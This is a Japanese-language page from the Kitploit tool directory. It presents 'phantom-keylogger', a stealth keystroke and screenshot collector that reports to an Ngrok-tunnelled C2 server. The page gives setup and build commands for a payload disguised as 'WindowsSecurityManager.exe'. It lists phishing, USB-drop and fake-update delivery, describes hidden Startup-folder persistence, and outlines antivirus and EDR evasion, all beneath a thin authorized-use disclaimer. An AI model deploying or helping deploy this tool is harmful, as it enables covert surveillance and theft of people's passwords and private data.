Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
phantom-keylogger — Phantom Keyloggerは、高度なステルス機能を備えたキーストロークおよびビジュアルインテリジェンス収集システムです。 | Kitploit
ツール/GitHubGitHub/mattiaalessi/phantom-keylogger
フィッシングツールペイロード生成永続化メカニズムIDS/IPS回避横移動データ流出コマンド&コントロールソーシャルエンジニアリングレッドチーミング
GitHubmattiaalessi/phantom-keylogger

phantom-keylogger

Phantom Keyloggerは、高度なステルス機能を備えたキーストロークおよびビジュアルインテリジェンス収集システムです。

77148ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

Phantom Keylogger

Red Team Stealth Version

🎯 ミッション概要

Phantom Keyloggerは、高度でステルス対応のキーストロークおよび視覚情報収集システムです。運用セキュリティを最優先目的として構築されており、このツールは、権限のあるレッドチーム演習において、対象システム上で最小限のフットプリントを維持しながら、持続的な監視機能を提供します。

⚠️ 運用プロトコル

認可された使用ケース:
- 認可された侵入テスト業務
- 書面による行動ルールがあるレッドチーム演習
- 管理された環境でのセキュリティ研究
- 防御的セキュリティ管理の検証

禁止された業務:
- 無許可の監視活動
- 違法な侵入またはデータの外部持ち出し
- 個人プライバシーの侵害
- 許可されていない攻撃的業務

オペレーターは適切な展開について全法的責任を負います

🛡️ 運用能力

情報収集モジュール

  • キーストローク傍受: 特殊キー変換を伴う高度なキーボードキャプチャ
  • 視覚監視: 設定可能な間隔での自動スクリーンショットキャプチャ
  • システム偵察: ホスト名、ユーザー名、環境データの収集
  • 永続的インプラント: 自動回復メカニズムによる継続的監視

運用セキュリティ機能

  • ゼロUIフットプリント: エンドユーザーから完全に不可視
  • 永続化メカニズム: 自動起動インストール
  • アンチフォレンジック: Mutexベースの単一インスタンス保護
  • ファイルシステム難読化: 隠しファイル属性と正当な命名

🚀 運用展開

フェーズ1: コマンド&コントロールインフラ

root@kitploit:~
# 1. Clone operational repository
git clone https://github.com/MattiaAlessi/phantom-keylogger
cd phantom-keylogger

# 2. Install operational dependencies
pip install -r requirements.txt

# 3. Deploy C2 server
python server.py

フェーズ2: ペイロード生成

root@kitploit:~
# Generate stealth executable
python build.py

出力: dist/WindowsSecurityManager.exe

フェーズ3: 標的展開

配送方法:

  • フィッシングキャンペーン: ドキュメントマクロまたは偽のインストーラ
  • 物理的アクセス: USBドロップ攻撃
  • 横方向移動: 侵害された内部共有
  • ソーシャルエンジニアリング: 偽のソフトウェアアップデート

フェーズ4: ビジュアルツール

root@kitploit:~
# Start the GUI interface 
python manager.py

🔧 技術仕様

アーキテクチャ概要

root@kitploit:~
┌─────────────────┐    ┌──────────────────┐    ┌─────────────────┐
│   TARGET        │    │   C2 TUNNEL      │    │   OPERATOR      │
│                 │    │                  │    │                 │
│  ┌─────────────┐│    │  ┌─────────────┐ │    │  ┌─────────────┐│
│  │ Stealth     ││    │  │ Ngrok       │ │    │  │ Management  ││
│  │ Keylogger   ├───────►│ Tunnel      ├───────►│ Console      ││
│  │             ││    │  │             │ │    │  │             ││
│  └─────────────┘│    │  └─────────────┘ │    │  └─────────────┘│
└─────────────────┘    └──────────────────┘    └─────────────────┘

永続化メカニズム

スタートアップフォルダ: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
ダイアログボックス (Win+R) で shell:startup と入力すると簡単にアクセスできます。
ファイル名: WindowsSecurityManager.exe
属性: 隠しシステムファイル

🛡️ 防御回避技術

AV/EDRバイパス手法

  • 正当な命名: Windowsセキュリティ関連の名称を使用
  • 行動難読化: 通常のシステムプロセスのパターン
  • ネットワークブレンディング: 正当に見えるドメインへのHTTPSトラフィック
  • メモリ操作: 不審なAPIコールやインジェクションなし

運用セキュリティ対策

  • ローカルアーティファクトなし: すべてのデータは暗号化チャネルを介してリモート送信
  • 標準ツール: 一般的でホワイトリスト登録されたPythonライブラリのみを使用
  • クリーン終了手順: クラッシュダンプやフォレンジックアーティファクトを残さない

📊 運用メトリクス

  • 検知回避: 複数のウイルス対策がインストールされた複数のセキュリティソリューションに対してテスト済み
  • データ流出: C2への暗号化リアルタイム送信
  • 運用稼働時間: 自動復旧による継続的監視
ツールをダウンロード